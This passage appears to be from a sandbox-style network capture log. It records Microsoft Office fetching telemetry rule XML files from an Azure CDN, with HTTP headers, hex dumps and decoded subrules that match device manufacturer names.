                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                            ETag: "0x8DC582B988EBD12"
                                                                                                                                                                            x-ms-request-id: 546431bf-201e-0085-0b72-2734e3000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181223Z-17fbfdc98bbds27mnhu6ftg4d800000003v0000000002yt7
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:23 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            31192.168.2.44978313.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:23 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:23 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:23 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 499
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                            ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                            x-ms-request-id: 789f6287-101e-0065-355f-284088000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181223Z-17fbfdc98bb2rxf2hfvcfz540000000003bg000000005hhg
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:23 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            32192.168.2.44978613.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:23 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:23 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:23 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                            ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                            x-ms-request-id: 1089ebf2-001e-0028-530d-27c49f000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181223Z-r1755647c666s72wx0z5rz6s6000000006fg000000004d1s
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:23 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            33192.168.2.44978513.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:23 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:23 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:23 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 471
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                            ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                            x-ms-request-id: 08308beb-701e-001e-43b0-26f5e6000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181223Z-17fbfdc98bbtwz55a8v24wfkdw00000006kg0000000057e4
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:23 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            34192.168.2.44978713.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:23 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:23 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:23 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 494
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                            ETag: "0x8DC582BB8972972"
                                                                                                                                                                            x-ms-request-id: ae9ca414-101e-008d-470d-2692e5000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181223Z-17fbfdc98bbvvplhck7mbap4bw00000006zg00000000cuk2
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:23 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            35192.168.2.44978813.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:24 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:24 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:24 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 420
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                            ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                            x-ms-request-id: 8e3eac93-d01e-0017-759c-27b035000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181224Z-17fbfdc98bb2cvg4m0cmab3ecw000000043000000000a63c
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:24 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            36192.168.2.44978913.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:24 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:25 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                            ETag: "0x8DC582B9D43097E"
                                                                                                                                                                            x-ms-request-id: d63b5638-a01e-0021-2ab4-27814c000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181224Z-17fbfdc98bbvvplhck7mbap4bw0000000750000000000dvm
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:25 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            37192.168.2.44979113.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:24 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:24 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:24 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 486
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                            ETag: "0x8DC582B92FCB436"
                                                                                                                                                                            x-ms-request-id: 01fc617d-601e-000d-05a4-262618000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181224Z-r1755647c66w6f6b5182nn0u0400000003v000000000aceu
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:24 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            38192.168.2.44979213.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:24 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:24 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 423
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                            ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                            x-ms-request-id: 5e4053db-f01e-0052-6472-279224000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181224Z-r1755647c66w6f6b5182nn0u0400000003sg00000000h1qa
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:24 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            39192.168.2.44979013.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:24 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:24 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:24 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 427
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                            ETag: "0x8DC582BA909FA21"
                                                                                                                                                                            x-ms-request-id: b953619b-001e-0017-7a89-280c3c000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181224Z-r1755647c66hxv26qums8q8fsw00000003g0000000009g0c
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:24 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            40192.168.2.44979313.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:25 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
